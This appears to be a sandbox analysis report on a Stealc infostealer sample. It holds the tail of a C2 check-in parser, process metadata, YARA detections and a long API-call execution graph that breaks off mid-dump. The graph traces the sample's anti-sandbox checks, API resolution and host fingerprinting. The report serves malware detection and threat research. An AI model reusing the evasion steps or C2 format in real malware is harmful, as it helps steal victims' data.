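    print("matches check-in shape:", looks_like_stealc_checkin(fields))
    print("C2 reply decodes to:", decode_c2_reply(CAPTURED_REPLY))
```

Run against the capture, the parser recovers hwid=2DF9AFB310603810289448 and build=mars, the body length matches the declared 211 bytes, and the reply decodes to "block". The hwid and build values are the two fields worth pivoting on in other captures from the same host, since the URL path is already shared by every related sample listed in the context tables above.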



                      Target ID:0
                      Start time:05:33:24
                      Start date:24/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
Imagebase:0x900000 (runtime base; the PE header's preferred base is 0x400000 and DYNAMIC_BASE is set, so the image was relocated, which is why the Yara hits below sit at 0x901000, i.e. RVA 0x1000, the first unnamed section)
                      File size:1'790'976 bytes
                      MD5 hash:6AE8D6DBE0F7340866C08C3F7B65978A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1430969378.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true


                        Execution Graph

                        Execution Coverage:5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.7%
                        Total number of Nodes:1405
                        Total number of Limit Nodes:28
execution_graph (node/edge dump of the rendered graph, condensed: each entry is the code address followed by the APIs resolved at that node, or the report's call count where no API names were given)

Main path from the entry node:
921bf0 -> 902a90: repeated calls into 904a60 (RtlAllocateHeap, VirtualProtect), then 926390 GetPEB -> 9265c3 LoadLibraryA x5 -> GetProcAddress chain (926625 .. 9266ad) -> back to 921c03
921c03 -> 921c29 lstrcpy / 921c35 -> 921c65 ExitProcess, or 921c6d GetSystemInfo -> 921c7d ExitProcess, or 921c85
921c85 -> 901030 GetCurrentProcess, VirtualAllocExNuma -> 901057 ExitProcess, or 90105e VirtualAlloc -> 90108a VirtualFree -> 9010d0 GlobalMemoryStatusEx -> 901112 ExitProcess, or 90111a GetUserDefaultLangID -> 921ca2 -> 921cb0 ExitProcess, or 921cb8
921cb8 -> 922ad0 GetProcessHeap, RtlAllocateHeap, GetComputerNameA -> 922a40 GetProcessHeap, RtlAllocateHeap, GetUserNameA (921ce0 ExitProcess on one branch) -> 921ce7 .. 921e30 lstrlen/lstrcpy/lstrcat string assembly, with second calls to 922ad0 (921d5a) and 922a40 (921dce)
921e30 -> 921e56 OpenEventA -> 921e68 CloseHandle, Sleep, OpenEventA (loops on itself), or 921e8c CreateEventA -> 921b20 GetSystemTime -> 921820 lstrlen/lstrcpy/lstrcat string assembly -> 921b81 sscanf -> 902a20 SystemTimeToFileTime x2 -> 921bd6 -> 921be2 ExitProcess, or 921be9
921be9 -> 91ffd0 lstrcpy/lstrlen chains -> 921570 lstrcpy -> 902e70 (repeated 904a60 calls) -> 920540 -> 921570 -> lstrlen/lstrcpy/lstrcat -> 922740 GetWindowsDirectoryA -> 904c50 -> 918ca0 StrCmpCA -> 901530 (8 API calls)
9207bc .. 920e95: alternating 901530 (8 API calls) and 9060d0 (80 API calls) around 9181b0 (10 API calls), 917ee0 lstrlen, lstrcpy, StrCmpCA x3, 918050 lstrlen, lstrcpy, StrCmpCA, lstrlen, lstrcpy, 905640 (8), 917280 (1498), 9183e0 (7), 9024e0 (230), 9185b0 (47), 91c840 (70), 91d0f0 (118), 91d7b0 (103, __call_reportfault), 91dfa0 (149), 91e500 (108), 91e720 (120), 91e9e0 (110), 91ecb0 (98), 907bc0 (154), 91eb70 (108), 9241e0 (91), 921660 (12) -> 921ea5 CloseHandle, ExitProcess

Nodes not connected to the main path:
922c10 GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA; 924480 OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy; 923130 GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey; 9230a0 GetSystemPowerStatus; 9229a0 GetCurrentProcess, IsWow64Process; 922cd0 GetUserDefaultLocaleName, LocalAlloc, CharToOemW; 923cc0 GetProcessHeap, RtlAllocateHeap, wsprintfA, lstrcpy; 9233c0 GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx, wsprintfA; 922853 lstrcpy; 92749e malloc, ctype; call-count-only nodes 924e35 (8), 912499 (290), 90db99 (672), 918615 (47/48/49), 922880 (10), 923480 (6), 923280 (7), 918c88 (16), 90b309 (98), 92938d (8 API calls, 4 library calls), 91abb2 (120), 9016b9 (200), 90f639 (144), 90bf39 (177), 9123a9 (298), 914b29 (303), 9101d9 (126), 913959 (244), 91e049 (147)
26159->26160 26161 903018 26160->26161 26162 904a60 2 API calls 26161->26162 26163 903031 26162->26163 26164 904a60 2 API calls 26163->26164 26165 903047 26164->26165 26166 904a60 2 API calls 26165->26166 26167 90305d 26166->26167 26168 904a60 2 API calls 26167->26168 26169 903073 26168->26169 26170 904a60 2 API calls 26169->26170 26171 903089 26170->26171 26172 904a60 2 API calls 26171->26172 26173 90309f 26172->26173 26174 904a60 2 API calls 26173->26174 26175 9030b8 26174->26175 26176 904a60 2 API calls 26175->26176 26177 9030ce 26176->26177 26178 904a60 2 API calls 26177->26178 26179 9030e4 26178->26179 26180 904a60 2 API calls 26179->26180 26181 9030fa 26180->26181 26182 904a60 2 API calls 26181->26182 26183 903110 26182->26183 26184 904a60 2 API calls 26183->26184 26185 903126 26184->26185 26186 904a60 2 API calls 26185->26186 26187 90313f 26186->26187 26188 904a60 2 API calls 26187->26188 26189 903155 26188->26189 26190 904a60 2 API calls 26189->26190 26191 90316b 26190->26191 26192 904a60 2 API calls 26191->26192 26193 903181 26192->26193 26194 904a60 2 API calls 26193->26194 26195 903197 26194->26195 26196 904a60 2 API calls 26195->26196 26197 9031ad 26196->26197 26198 904a60 2 API calls 26197->26198 26199 9031c6 26198->26199 26200 904a60 2 API calls 26199->26200 26201 9031dc 26200->26201 26202 904a60 2 API calls 26201->26202 26203 9031f2 26202->26203 26204 904a60 2 API calls 26203->26204 26205 903208 26204->26205 26206 904a60 2 API calls 26205->26206 26207 90321e 26206->26207 26208 904a60 2 API calls 26207->26208 26209 903234 26208->26209 26210 904a60 2 API calls 26209->26210 26211 90324d 26210->26211 26212 904a60 2 API calls 26211->26212 26213 903263 26212->26213 26214 904a60 2 API calls 26213->26214 26215 903279 26214->26215 26216 904a60 2 API calls 26215->26216 26217 90328f 26216->26217 26218 904a60 2 API calls 26217->26218 26219 9032a5 26218->26219 26220 904a60 2 API calls 26219->26220 26221 9032bb 26220->26221 26222 904a60 2 API calls 26221->26222 
26223 9032d4 26222->26223 26224 904a60 2 API calls 26223->26224 26225 9032ea 26224->26225 26226 904a60 2 API calls 26225->26226 26227 903300 26226->26227 26228 904a60 2 API calls 26227->26228 26229 903316 26228->26229 26230 904a60 2 API calls 26229->26230 26231 90332c 26230->26231 26232 904a60 2 API calls 26231->26232 26233 903342 26232->26233 26234 904a60 2 API calls 26233->26234 26235 90335b 26234->26235 26236 904a60 2 API calls 26235->26236 26237 903371 26236->26237 26238 904a60 2 API calls 26237->26238 26239 903387 26238->26239 26240 904a60 2 API calls 26239->26240 26241 90339d 26240->26241 26242 904a60 2 API calls 26241->26242 26243 9033b3 26242->26243 26244 904a60 2 API calls 26243->26244 26245 9033c9 26244->26245 26246 904a60 2 API calls 26245->26246 26247 9033e2 26246->26247 26248 904a60 2 API calls 26247->26248 26249 9033f8 26248->26249 26250 904a60 2 API calls 26249->26250 26251 90340e 26250->26251 26252 904a60 2 API calls 26251->26252 26253 903424 26252->26253 26254 904a60 2 API calls 26253->26254 26255 90343a 26254->26255 26256 904a60 2 API calls 26255->26256 26257 903450 26256->26257 26258 904a60 2 API calls 26257->26258 26259 903469 26258->26259 26260 904a60 2 API calls 26259->26260 26261 90347f 26260->26261 26262 904a60 2 API calls 26261->26262 26263 903495 26262->26263 26264 904a60 2 API calls 26263->26264 26265 9034ab 26264->26265 26266 904a60 2 API calls 26265->26266 26267 9034c1 26266->26267 26268 904a60 2 API calls 26267->26268 26269 9034d7 26268->26269 26270 904a60 2 API calls 26269->26270 26271 9034f0 26270->26271 26272 904a60 2 API calls 26271->26272 26273 903506 26272->26273 26274 904a60 2 API calls 26273->26274 26275 90351c 26274->26275 26276 904a60 2 API calls 26275->26276 26277 903532 26276->26277 26278 904a60 2 API calls 26277->26278 26279 903548 26278->26279 26280 904a60 2 API calls 26279->26280 26281 90355e 26280->26281 26282 904a60 2 API calls 26281->26282 26283 903577 26282->26283 26284 904a60 2 API calls 26283->26284 26285 90358d 
26284->26285 26286 904a60 2 API calls 26285->26286 26287 9035a3 26286->26287 26288 904a60 2 API calls 26287->26288 26289 9035b9 26288->26289 26290 904a60 2 API calls 26289->26290 26291 9035cf 26290->26291 26292 904a60 2 API calls 26291->26292 26293 9035e5 26292->26293 26294 904a60 2 API calls 26293->26294 26295 9035fe 26294->26295 26296 904a60 2 API calls 26295->26296 26297 903614 26296->26297 26298 904a60 2 API calls 26297->26298 26299 90362a 26298->26299 26300 904a60 2 API calls 26299->26300 26301 903640 26300->26301 26302 904a60 2 API calls 26301->26302 26303 903656 26302->26303 26304 904a60 2 API calls 26303->26304 26305 90366c 26304->26305 26306 904a60 2 API calls 26305->26306 26307 903685 26306->26307 26308 904a60 2 API calls 26307->26308 26309 90369b 26308->26309 26310 904a60 2 API calls 26309->26310 26311 9036b1 26310->26311 26312 904a60 2 API calls 26311->26312 26313 9036c7 26312->26313 26314 904a60 2 API calls 26313->26314 26315 9036dd 26314->26315 26316 904a60 2 API calls 26315->26316 26317 9036f3 26316->26317 26318 904a60 2 API calls 26317->26318 26319 90370c 26318->26319 26320 904a60 2 API calls 26319->26320 26321 903722 26320->26321 26322 904a60 2 API calls 26321->26322 26323 903738 26322->26323 26324 904a60 2 API calls 26323->26324 26325 90374e 26324->26325 26326 904a60 2 API calls 26325->26326 26327 903764 26326->26327 26328 904a60 2 API calls 26327->26328 26329 90377a 26328->26329 26330 904a60 2 API calls 26329->26330 26331 903793 26330->26331 26332 904a60 2 API calls 26331->26332 26333 9037a9 26332->26333 26334 904a60 2 API calls 26333->26334 26335 9037bf 26334->26335 26336 904a60 2 API calls 26335->26336 26337 9037d5 26336->26337 26338 904a60 2 API calls 26337->26338 26339 9037eb 26338->26339 26340 904a60 2 API calls 26339->26340 26341 903801 26340->26341 26342 904a60 2 API calls 26341->26342 26343 90381a 26342->26343 26344 904a60 2 API calls 26343->26344 26345 903830 26344->26345 26346 904a60 2 API calls 26345->26346 26347 903846 26346->26347 
26348 904a60 2 API calls 26347->26348 26349 90385c 26348->26349 26350 904a60 2 API calls 26349->26350 26351 903872 26350->26351 26352 904a60 2 API calls 26351->26352 26353 903888 26352->26353 26354 904a60 2 API calls 26353->26354 26355 9038a1 26354->26355 26356 904a60 2 API calls 26355->26356 26357 9038b7 26356->26357 26358 904a60 2 API calls 26357->26358 26359 9038cd 26358->26359 26360 904a60 2 API calls 26359->26360 26361 9038e3 26360->26361 26362 904a60 2 API calls 26361->26362 26363 9038f9 26362->26363 26364 904a60 2 API calls 26363->26364 26365 90390f 26364->26365 26366 904a60 2 API calls 26365->26366 26367 903928 26366->26367 26368 904a60 2 API calls 26367->26368 26369 90393e 26368->26369 26370 904a60 2 API calls 26369->26370 26371 903954 26370->26371 26372 904a60 2 API calls 26371->26372 26373 90396a 26372->26373 26374 904a60 2 API calls 26373->26374 26375 903980 26374->26375 26376 904a60 2 API calls 26375->26376 26377 903996 26376->26377 26378 904a60 2 API calls 26377->26378 26379 9039af 26378->26379 26380 904a60 2 API calls 26379->26380 26381 9039c5 26380->26381 26382 904a60 2 API calls 26381->26382 26383 9039db 26382->26383 26384 904a60 2 API calls 26383->26384 26385 9039f1 26384->26385 26386 904a60 2 API calls 26385->26386 26387 903a07 26386->26387 26388 904a60 2 API calls 26387->26388 26389 903a1d 26388->26389 26390 904a60 2 API calls 26389->26390 26391 903a36 26390->26391 26392 904a60 2 API calls 26391->26392 26393 903a4c 26392->26393 26394 904a60 2 API calls 26393->26394 26395 903a62 26394->26395 26396 904a60 2 API calls 26395->26396 26397 903a78 26396->26397 26398 904a60 2 API calls 26397->26398 26399 903a8e 26398->26399 26400 904a60 2 API calls 26399->26400 26401 903aa4 26400->26401 26402 904a60 2 API calls 26401->26402 26403 903abd 26402->26403 26404 904a60 2 API calls 26403->26404 26405 903ad3 26404->26405 26406 904a60 2 API calls 26405->26406 26407 903ae9 26406->26407 26408 904a60 2 API calls 26407->26408 26409 903aff 26408->26409 26410 904a60 2 
API calls 26409->26410 26411 903b15 26410->26411 26412 904a60 2 API calls 26411->26412 26413 903b2b 26412->26413 26414 904a60 2 API calls 26413->26414 26415 903b44 26414->26415 26416 904a60 2 API calls 26415->26416 26417 903b5a 26416->26417 26418 904a60 2 API calls 26417->26418 26419 903b70 26418->26419 26420 904a60 2 API calls 26419->26420 26421 903b86 26420->26421 26422 904a60 2 API calls 26421->26422 26423 903b9c 26422->26423 26424 904a60 2 API calls 26423->26424 26425 903bb2 26424->26425 26426 904a60 2 API calls 26425->26426 26427 903bcb 26426->26427 26428 904a60 2 API calls 26427->26428 26429 903be1 26428->26429 26430 904a60 2 API calls 26429->26430 26431 903bf7 26430->26431 26432 904a60 2 API calls 26431->26432 26433 903c0d 26432->26433 26434 904a60 2 API calls 26433->26434 26435 903c23 26434->26435 26436 904a60 2 API calls 26435->26436 26437 903c39 26436->26437 26438 904a60 2 API calls 26437->26438 26439 903c52 26438->26439 26440 904a60 2 API calls 26439->26440 26441 903c68 26440->26441 26442 904a60 2 API calls 26441->26442 26443 903c7e 26442->26443 26444 904a60 2 API calls 26443->26444 26445 903c94 26444->26445 26446 904a60 2 API calls 26445->26446 26447 903caa 26446->26447 26448 904a60 2 API calls 26447->26448 26449 903cc0 26448->26449 26450 904a60 2 API calls 26449->26450 26451 903cd9 26450->26451 26452 904a60 2 API calls 26451->26452 26453 903cef 26452->26453 26454 904a60 2 API calls 26453->26454 26455 903d05 26454->26455 26456 904a60 2 API calls 26455->26456 26457 903d1b 26456->26457 26458 904a60 2 API calls 26457->26458 26459 903d31 26458->26459 26460 904a60 2 API calls 26459->26460 26461 903d47 26460->26461 26462 904a60 2 API calls 26461->26462 26463 903d60 26462->26463 26464 904a60 2 API calls 26463->26464 26465 903d76 26464->26465 26466 904a60 2 API calls 26465->26466 26467 903d8c 26466->26467 26468 904a60 2 API calls 26467->26468 26469 903da2 26468->26469 26470 904a60 2 API calls 26469->26470 26471 903db8 26470->26471 26472 904a60 2 API calls 
26471->26472 26473 903dce 26472->26473 26474 904a60 2 API calls 26473->26474 26475 903de7 26474->26475 26476 904a60 2 API calls 26475->26476 26477 903dfd 26476->26477 26478 904a60 2 API calls 26477->26478 26479 903e13 26478->26479 26480 904a60 2 API calls 26479->26480 26481 903e29 26480->26481 26482 904a60 2 API calls 26481->26482 26483 903e3f 26482->26483 26484 904a60 2 API calls 26483->26484 26485 903e55 26484->26485 26486 904a60 2 API calls 26485->26486 26487 903e6e 26486->26487 26488 904a60 2 API calls 26487->26488 26489 903e84 26488->26489 26490 904a60 2 API calls 26489->26490 26491 903e9a 26490->26491 26492 904a60 2 API calls 26491->26492 26493 903eb0 26492->26493 26494 904a60 2 API calls 26493->26494 26495 903ec6 26494->26495 26496 904a60 2 API calls 26495->26496 26497 903edc 26496->26497 26498 904a60 2 API calls 26497->26498 26499 903ef5 26498->26499 26500 904a60 2 API calls 26499->26500 26501 903f0b 26500->26501 26502 904a60 2 API calls 26501->26502 26503 903f21 26502->26503 26504 904a60 2 API calls 26503->26504 26505 903f37 26504->26505 26506 904a60 2 API calls 26505->26506 26507 903f4d 26506->26507 26508 904a60 2 API calls 26507->26508 26509 903f63 26508->26509 26510 904a60 2 API calls 26509->26510 26511 903f7c 26510->26511 26512 904a60 2 API calls 26511->26512 26513 903f92 26512->26513 26514 904a60 2 API calls 26513->26514 26515 903fa8 26514->26515 26516 904a60 2 API calls 26515->26516 26517 903fbe 26516->26517 26518 904a60 2 API calls 26517->26518 26519 903fd4 26518->26519 26520 904a60 2 API calls 26519->26520 26521 903fea 26520->26521 26522 904a60 2 API calls 26521->26522 26523 904003 26522->26523 26524 904a60 2 API calls 26523->26524 26525 904019 26524->26525 26526 904a60 2 API calls 26525->26526 26527 90402f 26526->26527 26528 904a60 2 API calls 26527->26528 26529 904045 26528->26529 26530 904a60 2 API calls 26529->26530 26531 90405b 26530->26531 26532 904a60 2 API calls 26531->26532 26533 904071 26532->26533 26534 904a60 2 API calls 26533->26534 
26535 90408a 26534->26535 26536 904a60 2 API calls 26535->26536 26537 9040a0 26536->26537 26538 904a60 2 API calls 26537->26538 26539 9040b6 26538->26539 26540 904a60 2 API calls 26539->26540 26541 9040cc 26540->26541 26542 904a60 2 API calls 26541->26542 26543 9040e2 26542->26543 26544 904a60 2 API calls 26543->26544 26545 9040f8 26544->26545 26546 904a60 2 API calls 26545->26546 26547 904111 26546->26547 26548 904a60 2 API calls 26547->26548 26549 904127 26548->26549 26550 904a60 2 API calls 26549->26550 26551 90413d 26550->26551 26552 904a60 2 API calls 26551->26552 26553 904153 26552->26553 26554 904a60 2 API calls 26553->26554 26555 904169 26554->26555 26556 904a60 2 API calls 26555->26556 26557 90417f 26556->26557 26558 904a60 2 API calls 26557->26558 26559 904198 26558->26559 26560 904a60 2 API calls 26559->26560 26561 9041ae 26560->26561 26562 904a60 2 API calls 26561->26562 26563 9041c4 26562->26563 26564 904a60 2 API calls 26563->26564 26565 9041da 26564->26565 26566 904a60 2 API calls 26565->26566 26567 9041f0 26566->26567 26568 904a60 2 API calls 26567->26568 26569 904206 26568->26569 26570 904a60 2 API calls 26569->26570 26571 90421f 26570->26571 26572 904a60 2 API calls 26571->26572 26573 904235 26572->26573 26574 904a60 2 API calls 26573->26574 26575 90424b 26574->26575 26576 904a60 2 API calls 26575->26576 26577 904261 26576->26577 26578 904a60 2 API calls 26577->26578 26579 904277 26578->26579 26580 904a60 2 API calls 26579->26580 26581 90428d 26580->26581 26582 904a60 2 API calls 26581->26582 26583 9042a6 26582->26583 26584 904a60 2 API calls 26583->26584 26585 9042bc 26584->26585 26586 904a60 2 API calls 26585->26586 26587 9042d2 26586->26587 26588 904a60 2 API calls 26587->26588 26589 9042e8 26588->26589 26590 904a60 2 API calls 26589->26590 26591 9042fe 26590->26591 26592 904a60 2 API calls 26591->26592 26593 904314 26592->26593 26594 904a60 2 API calls 26593->26594 26595 90432d 26594->26595 26596 904a60 2 API calls 26595->26596 26597 904343 
26596->26597 26598 904a60 2 API calls 26597->26598 26599 904359 26598->26599 26600 904a60 2 API calls 26599->26600 26601 90436f 26600->26601 26602 904a60 2 API calls 26601->26602 26603 904385 26602->26603 26604 904a60 2 API calls 26603->26604 26605 90439b 26604->26605 26606 904a60 2 API calls 26605->26606 26607 9043b4 26606->26607 26608 904a60 2 API calls 26607->26608 26609 9043ca 26608->26609 26610 904a60 2 API calls 26609->26610 26611 9043e0 26610->26611 26612 904a60 2 API calls 26611->26612 26613 9043f6 26612->26613 26614 904a60 2 API calls 26613->26614 26615 90440c 26614->26615 26616 904a60 2 API calls 26615->26616 26617 904422 26616->26617 26618 904a60 2 API calls 26617->26618 26619 90443b 26618->26619 26620 904a60 2 API calls 26619->26620 26621 904451 26620->26621 26622 904a60 2 API calls 26621->26622 26623 904467 26622->26623 26624 904a60 2 API calls 26623->26624 26625 90447d 26624->26625 26626 904a60 2 API calls 26625->26626 26627 904493 26626->26627 26628 904a60 2 API calls 26627->26628 26629 9044a9 26628->26629 26630 904a60 2 API calls 26629->26630 26631 9044c2 26630->26631 26632 904a60 2 API calls 26631->26632 26633 9044d8 26632->26633 26634 904a60 2 API calls 26633->26634 26635 9044ee 26634->26635 26636 904a60 2 API calls 26635->26636 26637 904504 26636->26637 26638 904a60 2 API calls 26637->26638 26639 90451a 26638->26639 26640 904a60 2 API calls 26639->26640 26641 904530 26640->26641 26642 904a60 2 API calls 26641->26642 26643 904549 26642->26643 26644 904a60 2 API calls 26643->26644 26645 90455f 26644->26645 26646 904a60 2 API calls 26645->26646 26647 904575 26646->26647 26648 904a60 2 API calls 26647->26648 26649 90458b 26648->26649 26650 904a60 2 API calls 26649->26650 26651 9045a1 26650->26651 26652 904a60 2 API calls 26651->26652 26653 9045b7 26652->26653 26654 904a60 2 API calls 26653->26654 26655 9045d0 26654->26655 26656 904a60 2 API calls 26655->26656 26657 9045e6 26656->26657 26658 904a60 2 API calls 26657->26658 26659 9045fc 26658->26659 
26660 904a60 2 API calls 26659->26660 26661 904612 26660->26661 26662 904a60 2 API calls 26661->26662 26663 904628 26662->26663 26664 904a60 2 API calls 26663->26664 26665 90463e 26664->26665 26666 904a60 2 API calls 26665->26666 26667 904657 26666->26667 26668 904a60 2 API calls 26667->26668 26669 90466d 26668->26669 26670 904a60 2 API calls 26669->26670 26671 904683 26670->26671 26672 904a60 2 API calls 26671->26672 26673 904699 26672->26673 26674 904a60 2 API calls 26673->26674 26675 9046af 26674->26675 26676 904a60 2 API calls 26675->26676 26677 9046c5 26676->26677 26678 904a60 2 API calls 26677->26678 26679 9046de 26678->26679 26680 904a60 2 API calls 26679->26680 26681 9046f4 26680->26681 26682 904a60 2 API calls 26681->26682 26683 90470a 26682->26683 26684 904a60 2 API calls 26683->26684 26685 904720 26684->26685 26686 904a60 2 API calls 26685->26686 26687 904736 26686->26687 26688 904a60 2 API calls 26687->26688 26689 90474c 26688->26689 26690 904a60 2 API calls 26689->26690 26691 904765 26690->26691 26692 904a60 2 API calls 26691->26692 26693 90477b 26692->26693 26694 904a60 2 API calls 26693->26694 26695 904791 26694->26695 26696 904a60 2 API calls 26695->26696 26697 9047a7 26696->26697 26698 904a60 2 API calls 26697->26698 26699 9047bd 26698->26699 26700 904a60 2 API calls 26699->26700 26701 9047d3 26700->26701 26702 904a60 2 API calls 26701->26702 26703 9047ec 26702->26703 26704 904a60 2 API calls 26703->26704 26705 904802 26704->26705 26706 904a60 2 API calls 26705->26706 26707 904818 26706->26707 26708 904a60 2 API calls 26707->26708 26709 90482e 26708->26709 26710 904a60 2 API calls 26709->26710 26711 904844 26710->26711 26712 904a60 2 API calls 26711->26712 26713 90485a 26712->26713 26714 904a60 2 API calls 26713->26714 26715 904873 26714->26715 26716 904a60 2 API calls 26715->26716 26717 904889 26716->26717 26718 904a60 2 API calls 26717->26718 26719 90489f 26718->26719 26720 904a60 2 API calls 26719->26720 26721 9048b5 26720->26721 26722 904a60 2 
API calls 26721->26722 26723 9048cb 26722->26723 26724 904a60 2 API calls 26723->26724 26725 9048e1 26724->26725 26726 904a60 2 API calls 26725->26726 26727 9048fa 26726->26727 26728 904a60 2 API calls 26727->26728 26729 904910 26728->26729 26730 904a60 2 API calls 26729->26730 26731 904926 26730->26731 26732 904a60 2 API calls 26731->26732 26733 90493c 26732->26733 26734 904a60 2 API calls 26733->26734 26735 904952 26734->26735 26736 904a60 2 API calls 26735->26736 26737 904968 26736->26737 26738 904a60 2 API calls 26737->26738 26739 904981 26738->26739 26740 904a60 2 API calls 26739->26740 26741 904997 26740->26741 26742 904a60 2 API calls 26741->26742 26743 9049ad 26742->26743 26744 904a60 2 API calls 26743->26744 26745 9049c3 26744->26745 26746 904a60 2 API calls 26745->26746 26747 9049d9 26746->26747 26748 904a60 2 API calls 26747->26748 26749 9049ef 26748->26749 26750 904a60 2 API calls 26749->26750 26751 904a08 26750->26751 26752 904a60 2 API calls 26751->26752 26753 904a1e 26752->26753 26754 904a60 2 API calls 26753->26754 26755 904a34 26754->26755 26756 904a60 2 API calls 26755->26756 26757 904a4a 26756->26757 26758 9266e0 26757->26758 26759 926afe 8 API calls 26758->26759 26760 9266ed 43 API calls 26758->26760 26761 926b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26759->26761 26762 926c08 26759->26762 26760->26759 26761->26762 26763 926cd2 26762->26763 26764 926c15 8 API calls 26762->26764 26765 926cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26763->26765 26766 926d4f 26763->26766 26764->26763 26765->26766 26767 926de9 26766->26767 26768 926d5c 6 API calls 26766->26768 26769 926f10 26767->26769 26770 926df6 12 API calls 26767->26770 26768->26767 26771 926f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26769->26771 26772 926f8d 26769->26772 26770->26769 26771->26772 26773 926fc1 26772->26773 26774 926f96 GetProcAddress GetProcAddress 26772->26774 26775 926ff5 
26773->26775 26776 926fca GetProcAddress GetProcAddress 26773->26776 26774->26773 26777 927002 10 API calls 26775->26777 26778 9270ed 26775->26778 26776->26775 26777->26778 26779 927152 26778->26779 26780 9270f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26778->26780 26781 92715b GetProcAddress 26779->26781 26782 92716e 26779->26782 26780->26779 26781->26782 26783 92051f 26782->26783 26784 927177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26782->26784 26785 901530 26783->26785 26784->26783 27094 901610 26785->27094 26787 90153b 26788 901555 lstrcpy 26787->26788 26789 90155d 26787->26789 26788->26789 26790 901577 lstrcpy 26789->26790 26791 90157f 26789->26791 26790->26791 26792 901599 lstrcpy 26791->26792 26794 9015a1 26791->26794 26792->26794 26793 901605 26796 91f1b0 lstrlen 26793->26796 26794->26793 26795 9015fd lstrcpy 26794->26795 26795->26793 26797 91f1e4 26796->26797 26798 91f1f7 lstrlen 26797->26798 26799 91f1eb lstrcpy 26797->26799 26800 91f208 26798->26800 26799->26798 26801 91f21b lstrlen 26800->26801 26802 91f20f lstrcpy 26800->26802 26803 91f22c 26801->26803 26802->26801 26804 91f233 lstrcpy 26803->26804 26805 91f23f 26803->26805 26804->26805 26806 91f258 lstrcpy 26805->26806 26807 91f264 26805->26807 26806->26807 26808 91f286 lstrcpy 26807->26808 26809 91f292 26807->26809 26808->26809 26810 91f2ba lstrcpy 26809->26810 26811 91f2c6 26809->26811 26810->26811 26812 91f2ea lstrcpy 26811->26812 26856 91f300 26811->26856 26812->26856 26813 91f30c lstrlen 26813->26856 26814 91f4b9 lstrcpy 26814->26856 26815 91f3a1 lstrcpy 26815->26856 26816 91f3c5 lstrcpy 26816->26856 26817 91f4e8 lstrcpy 26878 91f4f0 26817->26878 26818 91efb0 35 API calls 26818->26878 26819 91f479 lstrcpy 26819->26856 26820 91f59c lstrcpy 26820->26878 26821 91f70f StrCmpCA 26826 91fe8e 26821->26826 26821->26856 26822 91f616 StrCmpCA 26822->26821 26822->26878 26823 91fa29 StrCmpCA 26834 91fe2b 26823->26834 26823->26856 26824 91f73e lstrlen 26824->26856 26825 
91fd4d StrCmpCA 26828 91fd60 Sleep 26825->26828 26839 91fd75 26825->26839 26827 91fead lstrlen 26826->26827 26832 91fea5 lstrcpy 26826->26832 26835 91fec7 26827->26835 26828->26856 26829 91fa58 lstrlen 26829->26856 26830 91f64a lstrcpy 26830->26878 26831 901530 8 API calls 26831->26878 26832->26827 26833 91fe4a lstrlen 26841 91fe64 26833->26841 26834->26833 26836 91fe42 lstrcpy 26834->26836 26842 91fee7 lstrlen 26835->26842 26845 91fedf lstrcpy 26835->26845 26836->26833 26837 91f89e lstrcpy 26837->26856 26838 91fd94 lstrlen 26855 91fdae 26838->26855 26839->26838 26843 91fd8c lstrcpy 26839->26843 26840 91f76f lstrcpy 26840->26856 26848 91fdce lstrlen 26841->26848 26849 91fe7c lstrcpy 26841->26849 26846 91ff01 26842->26846 26843->26838 26844 91fbb8 lstrcpy 26844->26856 26845->26842 26854 91ff21 26846->26854 26857 91ff19 lstrcpy 26846->26857 26847 91fa89 lstrcpy 26847->26856 26863 91fde8 26848->26863 26849->26848 26850 91f791 lstrcpy 26850->26856 26852 901530 8 API calls 26852->26856 26853 91f8cd lstrcpy 26853->26878 26858 901610 4 API calls 26854->26858 26855->26848 26861 91fdc6 lstrcpy 26855->26861 26856->26813 26856->26814 26856->26815 26856->26816 26856->26817 26856->26819 26856->26821 26856->26823 26856->26824 26856->26825 26856->26829 26856->26837 26856->26840 26856->26844 26856->26847 26856->26850 26856->26852 26856->26853 26859 91faab lstrcpy 26856->26859 26862 91fbe7 lstrcpy 26856->26862 26864 91ee90 28 API calls 26856->26864 26868 91f7e2 lstrcpy 26856->26868 26871 91fafc lstrcpy 26856->26871 26856->26878 26857->26854 26880 91fe13 26858->26880 26859->26856 26860 91f698 lstrcpy 26860->26878 26861->26848 26862->26878 26865 91fe08 26863->26865 26866 91fe00 lstrcpy 26863->26866 26864->26856 26867 901610 4 API calls 26865->26867 26866->26865 26867->26880 26868->26856 26869 91f99e StrCmpCA 26869->26823 26869->26878 26870 91f924 lstrcpy 26870->26878 26871->26856 26872 91fc3e lstrcpy 26872->26878 26873 91fcb8 StrCmpCA 26873->26825 26873->26878 26874 91f9cb lstrcpy 
